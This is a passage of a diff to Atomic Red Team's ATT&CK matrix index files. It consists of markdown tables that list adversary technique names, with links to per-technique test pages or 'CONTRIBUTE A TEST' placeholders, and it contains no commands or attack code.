TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
| [Valid Accounts: Default Accounts](../../T1078.001/T1078.001.md) | ESXi Administration Command [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Kubernetes Cronjob](../../T1053.007/T1053.007.md) | [Abuse Elevation Control Mechanism: Sudo and Sudo Caching](../../T1548.003/T1548.003.md) | [Signed Script Proxy Execution: Pubprn](../../T1216.001/T1216.001.md) | [Brute Force: Password Cracking](../../T1110.002/T1110.002.md) | [Virtualization/Sandbox Evasion: System Checks](../../T1497.001/T1497.001.md) | Remote Service Session Hijacking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Data from Removable Media](../../T1025/T1025.md) | [Exfiltration Over Alternative Protocol - Exfiltration Over Asymmetric Encrypted Non-C2 Protocol](../../T1048.002/T1048.002.md) | [Content Injection](../../T1659/T1659.md) | [Service Stop](../../T1489/T1489.md) |
| Content Injection [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Component Object Model [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | LC_LOAD_DYLIB Addition [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Abuse Elevation Control Mechanism: Bypass User Account Control](../../T1548.002/T1548.002.md) | [File and Directory Permissions Modification: FreeBSD, Linux and Mac File and Directory Permissions Modification](../../T1222.002/T1222.002.md) | Securityd Memory [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Account Discovery: Local Account](../../T1087.001/T1087.001.md) | Remote Services [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Email Collection [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Exfiltration to Code Repository [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Remote Access Software](../../T1219/T1219.md) | Stored Data Manipulation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
| [Valid Accounts: Default Accounts](../../T1078.001/T1078.001.md) | ESXi Administration Command [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Kubernetes Cronjob](../../T1053.007/T1053.007.md) | [Abuse Elevation Control Mechanism: Sudo and Sudo Caching](../../T1548.003/T1548.003.md) | [Signed Script Proxy Execution: Pubprn](../../T1216.001/T1216.001.md) | [Brute Force: Password Cracking](../../T1110.002/T1110.002.md) | [Virtualization/Sandbox Evasion: System Checks](../../T1497.001/T1497.001.md) | Remote Service Session Hijacking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Data from Removable Media](../../T1025/T1025.md) | [Exfiltration Over Alternative Protocol - Exfiltration Over Asymmetric Encrypted Non-C2 Protocol](../../T1048.002/T1048.002.md) | Content Injection [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Service Stop](../../T1489/T1489.md) |
| Trusted Relationship [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Scheduled Task/Job [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Pre-OS Boot: System Firmware](../../T1542.001/T1542.001.md) | [Hijack Execution Flow: Services Registry Permissions Weakness](../../T1574.011/T1574.011.md) | Path Interception by PATH Environment Variable [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Credentials from Password Stores: Keychain](../../T1555.001/T1555.001.md) | [Permission Groups Discovery: Domain Groups](../../T1069.002/T1069.002.md) | [Remote Services: Windows Remote Management](../../T1021.006/T1021.006.md) | [Data Staged: Local Data Staging](../../T1074.001/T1074.001.md) | [Exfiltration Over C2 Channel](../../T1041/T1041.md) | Traffic Signaling [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Application or System Exploitation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
| Phishing [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Command and Scripting Interpreter: AppleScript](../../T1059.002/T1059.002.md) | [Hijack Execution Flow: Services Registry Permissions Weakness](../../T1574.011/T1574.011.md) | [Boot or Logon Autostart Execution](../../T1547/T1547.md) | [Direct Volume Access](../../T1006/T1006.md) | [OS Credential Dumping: LSA Secrets](../../T1003.004/T1003.004.md) | [System Service Discovery](../../T1007/T1007.md) | [Remote Services: Distributed Component Object Model](../../T1021.003/T1021.003.md) | [Email Collection: Local Email Collection](../../T1114.001/T1114.001.md) | [Exfiltration Over Alternative Protocol](../../T1048/T1048.md) | [Protocol Tunneling](../../T1572/T1572.md) | Runtime Data Manipulation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
| Valid Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Native API](../../T1106/T1106.md) | Bootkit [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Active Setup](../../T1547.014/T1547.014.md) | Modify Cloud Resource Hierarchy [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Forge Web Credentials: SAML token](../../T1606.002/T1606.002.md) | [Network Sniffing](../../T1040/T1040.md) | [Use Alternate Authentication Material: Pass the Ticket](../../T1550.003/T1550.003.md) | Databases [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Exfiltration over USB [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Mail Protocols [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Reflection Amplification [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
| Spearphishing Voice [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Command and Scripting Interpreter: AutoHotKey & AutoIT](../../T1059.010/T1059.010.md) | [Boot or Logon Autostart Execution](../../T1547/T1547.md) | [Domain Trust Modification](../../T1484.002/T1484.002.md) | [Hide Artifacts: Email Hiding Rules](../../T1564.008/T1564.008.md) | [OS Credential Dumping: Proc Filesystem](../../T1003.007/T1003.007.md) | [Network Share Discovery](../../T1135/T1135.md) | Cloud Services [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Automated Collection](../../T1119/T1119.md) | [Exfiltration Over Web Service: Exfiltration to Text Storage Sites](../../T1567.003/T1567.003.md) | Communication Through Removable Media [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Service Exhaustion Flood [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
| [Compromise Software Supply Chain](../../T1195.002/T1195.002.md) | [System Services: Systemctl](../../T1569.003/T1569.003.md) | [Active Setup](../../T1547.014/T1547.014.md) | [Create or Modify System Process: Windows Service](../../T1543.003/T1543.003.md) | [Obfuscated Files or Information: Encrypted/Encoded File](../../T1027.013/T1027.013.md) | Password Managers [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Peripheral Device Discovery](../../T1120/T1120.md) | [Software Deployment Tools](../../T1072/T1072.md) | [Clipboard Data](../../T1115/T1115.md) | [Exfiltration Over Web Service: Exfiltration to Cloud Storage](../../T1567.002/T1567.002.md) | External Proxy [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Defacement [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
| [Compromise Software Supply Chain](../../T1195.002/T1195.002.md) | Systemctl [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Active Setup](../../T1547.014/T1547.014.md) | [Create or Modify System Process: Windows Service](../../T1543.003/T1543.003.md) | [Obfuscated Files or Information: Encrypted/Encoded File](../../T1027.013/T1027.013.md) | Password Managers [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Peripheral Device Discovery](../../T1120/T1120.md) | [Software Deployment Tools](../../T1072/T1072.md) | [Clipboard Data](../../T1115/T1115.md) | [Exfiltration Over Web Service: Exfiltration to Cloud Storage](../../T1567.002/T1567.002.md) | External Proxy [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Defacement [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
| Domain Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Cloud API [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Browser Extensions [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Scheduled Task/Job: Cron](../../T1053.003/T1053.003.md) | [Rootkit](../../T1014/T1014.md) | [Network Sniffing](../../T1040/T1040.md) | [System Information Discovery](../../T1082/T1082.md) | Exploitation of Remote Services [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Data from Cloud Storage Object](../../T1530/T1530.md) | [Data Transfer Size Limits](../../T1030/T1030.md) | Proxy [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Bandwidth Hijacking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
| Hardware Additions [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Deploy a container](../../T1610/T1610.md) | TFTP Boot [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Account Manipulation: Additional Cloud Roles](../../T1098.003/T1098.003.md) | [Masquerading: Double File Extension](../../T1036.007/T1036.007.md) | [Unsecured Credentials: Credentials in Registry](../../T1552.002/T1552.002.md) | [System Network Configuration Discovery: Wi-Fi Discovery](../../T1016.002/T1016.002.md) | Internal Spearphishing [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Remote Data Staging [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Transfer Data to Cloud Account [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | IDE Tunneling [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Financial Theft [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
| Drive-by Compromise [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Input Injection [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Create or Modify System Process: Windows Service](../../T1543.003/T1543.003.md) | [Boot or Logon Autostart Execution: Print Processors](../../T1547.012/T1547.012.md) | [Abuse Elevation Control Mechanism: Bypass User Account Control](../../T1548.002/T1548.002.md) | [Modify Authentication Process: Password Filter DLL](../../T1556.002/T1556.002.md) | Backup Software Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Lateral Tool Transfer](../../T1570/T1570.md) | [Data from Local System](../../T1005/T1005.md) | Exfiltration Over Physical Medium [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Dynamic Resolution [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Defacement: Internal Defacement](../../T1491.001/T1491.001.md) |
@@ -32,7 +32,7 @@
| | [Scheduled Task/Job: Systemd Timers](../../T1053.006/T1053.006.md) | [Modify Authentication Process: Password Filter DLL](../../T1556.002/T1556.002.md) | [Escape to Host](../../T1611/T1611.md) | [Domain Trust Modification](../../T1484.002/T1484.002.md) | [Adversary-in-the-Middle: LLMNR/NBT-NS Poisoning and SMB Relay](../../T1557.001/T1557.001.md) | [System Network Connections Discovery](../../T1049/T1049.md) | | [Email Collection: Email Forwarding Rule](../../T1114.003/T1114.003.md) | | [Encrypted Channel](../../T1573/T1573.md) | Network Denial of Service [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
| | [Command and Scripting Interpreter: Bash](../../T1059.004/T1059.004.md) | [Server Software Component: Terminal Services DLL](../../T1505.005/T1505.005.md) | [Boot or Logon Autostart Execution: Shortcut Modification](../../T1547.009/T1547.009.md) | [Impair Defenses: Safe Boot Mode](../../T1562.009/T1562.009.md) | [OS Credential Dumping: LSASS Memory](../../T1003.001/T1003.001.md) | Virtualization/Sandbox Evasion [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | Data Staged [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | Bidirectional Communication [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Firmware Corruption [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
| | [Inter-Process Communication](../../T1559/T1559.md) | [Browser Extensions](../../T1176/T1176.md) | [Boot or Logon Autostart Execution: Security Support Provider](../../T1547.005/T1547.005.md) | TFTP Boot [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Brute Force: Password Spraying](../../T1110.003/T1110.003.md) | [Cloud Storage Object Discovery](../../T1619/T1619.md) | | [Input Capture: GUI Input Capture](../../T1056.002/T1056.002.md) | | Asymmetric Cryptography [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Inhibit System Recovery](../../T1490/T1490.md) |
| | Lua [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Office Application Startup: Outlook Rules](../../T1137.005/T1137.005.md) | [Create or Modify System Process: Launch Daemon](../../T1543.004/T1543.004.md) | [Virtualization/Sandbox Evasion: System Checks](../../T1497.001/T1497.001.md) | Web Portal Capture [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Log Enumeration](../../T1654/T1654.md) | | [Data from Network Shared Drive](../../T1039/T1039.md) | | [Non-Application Layer Protocol](../../T1095/T1095.md) | Disk Content Wipe [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
| | Lua [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Outlook Rules [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Create or Modify System Process: Launch Daemon](../../T1543.004/T1543.004.md) | [Virtualization/Sandbox Evasion: System Checks](../../T1497.001/T1497.001.md) | Web Portal Capture [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Log Enumeration](../../T1654/T1654.md) | | [Data from Network Shared Drive](../../T1039/T1039.md) | | [Non-Application Layer Protocol](../../T1095/T1095.md) | Disk Content Wipe [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
| | [User Execution: Malicious Image](../../T1204.003/T1204.003.md) | Additional Local or Domain Groups [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Hijack Execution Flow: Path Interception by Search Order Hijacking](../../T1574.008/T1574.008.md) | [Indicator Removal on Host: Clear FreeBSD, Linux or Mac System Logs](../../T1070.002/T1070.002.md) | [OS Credential Dumping: Cached Domain Credentials](../../T1003.005/T1003.005.md) | Cloud Account [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | [Email Collection: Remote Email Collection](../../T1114.002/T1114.002.md) | | Protocol or Service Impersonation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [System Shutdown/Reboot](../../T1529/T1529.md) |
| | Exploitation for Client Execution [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Event Triggered Execution: Application Shimming](../../T1546.011/T1546.011.md) | [Domain Policy Modification: Group Policy Modification](../../T1484.001/T1484.001.md) | [Signed Binary Proxy Execution: InstallUtil](../../T1218.004/T1218.004.md) | [Steal or Forge Kerberos Tickets: Golden Ticket](../../T1558.001/T1558.001.md) | [Process Discovery](../../T1057/T1057.md) | | Input Capture [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | Domain Fronting [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | |
| | Container CLI/API [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Boot or Logon Autostart Execution: Port Monitors](../../T1547.010/T1547.010.md) | [Valid Accounts: Default Accounts](../../T1078.001/T1078.001.md) | Stripped Payloads [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Steal or Forge Authentication Certificates](../../T1649/T1649.md) | User Activity Based Checks [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | Customer Relationship Management Software [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | Data Encoding [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | |
@@ -58,7 +58,7 @@
| | | Executable Installer File Permissions Weakness [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Account Manipulation: Additional Cloud Credentials](../../T1098.001/T1098.001.md) | [Signed Binary Proxy Execution](../../T1218/T1218.md) | [OS Credential Dumping: /etc/passwd, /etc/master.passwd and /etc/shadow](../../T1003.008/T1003.008.md) | | | | | | |
| | | [Event Triggered Execution: Accessibility Features](../../T1546.008/T1546.008.md) | Make and Impersonate Token [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Indicator Removal on Host: Timestomp](../../T1070.006/T1070.006.md) | [Steal or Forge Kerberos Tickets: Silver Ticket](../../T1558.002/T1558.002.md) | | | | | | |
| | | [Create Account: Domain Account](../../T1136.002/T1136.002.md) | [Event Triggered Execution: Windows Management Instrumentation Event Subscription](../../T1546.003/T1546.003.md) | [Reflective Code Loading](../../T1620/T1620.md) | [Credentials from Password Stores: Windows Credential Manager](../../T1555.004/T1555.004.md) | | | | | | |
| | | Component Firmware [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Access Token Manipulation: Parent PID Spoofing](../../T1134.004/T1134.004.md) | Mutual Exclusion [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Modify Authentication Process: Domain Controller Authentication](../../T1556.001/T1556.001.md) | | | | | | |
| | | Component Firmware [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Access Token Manipulation: Parent PID Spoofing](../../T1134.004/T1134.004.md) | Mutual Exclusion [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Domain Controller Authentication [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | |
| | | [Office Application Startup: Office Template Macros.](../../T1137.001/T1137.001.md) | [Event Triggered Execution: Change Default File Association](../../T1546.001/T1546.001.md) | Ignore Process Interrupts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Reversible Encryption [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | |
| | | [Event Triggered Execution: AppCert DLLs](../../T1546.009/T1546.009.md) | VDSO Hijacking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Time Based Evasion](../../T1497.003/T1497.003.md) | Multi-Factor Authentication Interception [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | |
| | | Device Registration [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Event Triggered Execution: Emond](../../T1546.014/T1546.014.md) | [Signed Binary Proxy Execution: CMSTP](../../T1218.003/T1218.003.md) | [OS Credential Dumping: NTDS](../../T1003.003/T1003.003.md) | | | | | | |
@@ -82,7 +82,7 @@
| | | Outlook Forms [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Hijack Execution Flow: Path Interception by Unquoted Path](../../T1574.009/T1574.009.md) | [Obfuscated Files or Information: Binary Padding](../../T1027.001/T1027.001.md) | | | | | | | |
| | | Hijack Execution Flow [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Boot or Logon Initialization Scripts: Startup Items](../../T1037.005/T1037.005.md) | [Domain Policy Modification: Group Policy Modification](../../T1484.001/T1484.001.md) | | | | | | | |
| | | Container Service [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Domain Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Valid Accounts: Default Accounts](../../T1078.001/T1078.001.md) | | | | | | | |
| | | Valid Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Event Triggered Execution: Python Startup Hooks](../../T1546.018/T1546.018.md) | [Hijack Execution Flow: LD_PRELOAD](../../T1574.006/T1574.006.md) | | | | | | | |
| | | Valid Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Python Startup Hooks [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Hijack Execution Flow: LD_PRELOAD](../../T1574.006/T1574.006.md) | | | | | | | |
| | | Multi-Factor Authentication [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Network Logon Script [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Indicator Removal on Host: Clear Windows Event Logs](../../T1070.001/T1070.001.md) | | | | | | | |
| | | [IIS Components](../../T1505.004/T1505.004.md) | [Event Triggered Execution: AppInit DLLs](../../T1546.010/T1546.010.md) | [File and Directory Permissions Modification](../../T1222/T1222.md) | | | | | | | |
| | | [Event Triggered Execution](../../T1546/T1546.md) | [Event Triggered Execution: Screensaver](../../T1546.002/T1546.002.md) | Junk Code Insertion [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
@@ -94,7 +94,7 @@
| | | [Boot or Logon Initialization Scripts: Startup Items](../../T1037.005/T1037.005.md) | [Create or Modify System Process: SysV/Systemd Service](../../T1543.002/T1543.002.md) | Process Doppelgänging [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
| | | Cloud Application Integration [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | XDG Autostart Entries [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Delete Cloud Instance [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
| | | Domain Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Thread Local Storage [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Executable Installer File Permissions Weakness [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
| | | [Event Triggered Execution: Python Startup Hooks](../../T1546.018/T1546.018.md) | [Boot or Logon Autostart Execution: Re-opened Applications](../../T1547.007/T1547.007.md) | [Impair Defenses: Indicator Blocking](../../T1562.006/T1562.006.md) | | | | | | | |
| | | Python Startup Hooks [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Boot or Logon Autostart Execution: Re-opened Applications](../../T1547.007/T1547.007.md) | [Impair Defenses: Indicator Blocking](../../T1562.006/T1562.006.md) | | | | | | | |
| | | Network Logon Script [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Account Manipulation: Additional Email Delegate Permissions](../../T1098.002/T1098.002.md) | Extended Attributes [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
| | | [BITS Jobs](../../T1197/T1197.md) | TCC Manipulation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Disable or Modify Cloud Firewall [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
| | | [Event Triggered Execution: AppInit DLLs](../../T1546.010/T1546.010.md) | Ptrace System Calls [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Right-to-Left Override [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
@@ -102,7 +102,7 @@
| | | Conditional Access Policies [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Process Injection: ListPlanting](../../T1055.015/T1055.015.md) | Component Firmware [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
| | | [Create or Modify System Process: Launch Agent](../../T1543.001/T1543.001.md) | Domain or Tenant Policy Modification [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Indicator Removal on Host](../../T1070/T1070.md) | | | | | | | |
| | | Server Software Component [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Boot or Logon Autostart Execution: LSASS Driver](../../T1547.008/T1547.008.md) | [Use Alternate Authentication Material: Pass the Ticket](../../T1550.003/T1550.003.md) | | | | | | | |
| | | [Modify Authentication Process: Domain Controller Authentication](../../T1556.001/T1556.001.md) | [Valid Accounts: Cloud Accounts](../../T1078.004/T1078.004.md) | [Masquerading: Masquerade Task or Service](../../T1036.004/T1036.004.md) | | | | | | | |
| | | Domain Controller Authentication [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Valid Accounts: Cloud Accounts](../../T1078.004/T1078.004.md) | [Masquerading: Masquerade Task or Service](../../T1036.004/T1036.004.md) | | | | | | | |
| | | Reversible Encryption [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Scheduled Task/Job: At](../../T1053.002/T1053.002.md) | [Process Injection: Asynchronous Procedure Call](../../T1055.004/T1055.004.md) | | | | | | | |
| | | Installer Packages [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Process Injection: Dynamic-link Library Injection](../../T1055.001/T1055.001.md) | [Plist File Modification](../../T1647/T1647.md) | | | | | | | |
| | | [Boot or Logon Initialization Scripts: Rc.common](../../T1037.004/T1037.004.md) | Udev Rules [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | JamPlus [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
@@ -176,7 +176,7 @@
| | | | | Patch System Image [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
| | | | | Clear Persistence [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
| | | | | Masquerade Account Name [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
| | | | | [Modify Authentication Process: Domain Controller Authentication](../../T1556.001/T1556.001.md) | | | | | | | |
| | | | | Domain Controller Authentication [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
| | | | | [HTML Smuggling](../../T1027.006/T1027.006.md) | | | | | | | |
| | | | | Reversible Encryption [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
| | | | | Command Obfuscation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
atomics/Indexes/Matrices/windows-matrix.md
+10 -10
View File
@@ -3,14 +3,14 @@
|-----|-----|-----|-----|-----|-----|-----|-----|-----|-----|-----|-----|
| [External Remote Services](../../T1133/T1133.md) | [Scheduled Task/Job: Scheduled Task](../../T1053.005/T1053.005.md) | [Scheduled Task/Job: Scheduled Task](../../T1053.005/T1053.005.md) | [Process Injection: Extra Window Memory Injection](../../T1055.011/T1055.011.md) | [Process Injection: Extra Window Memory Injection](../../T1055.011/T1055.011.md) | Adversary-in-the-Middle [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [System Owner/User Discovery](../../T1033/T1033.md) | Remote Services:VNC [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Archive Collected Data: Archive via Utility](../../T1560.001/T1560.001.md) | Exfiltration Over Web Service [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Socket Filters [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Disk Structure Wipe [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
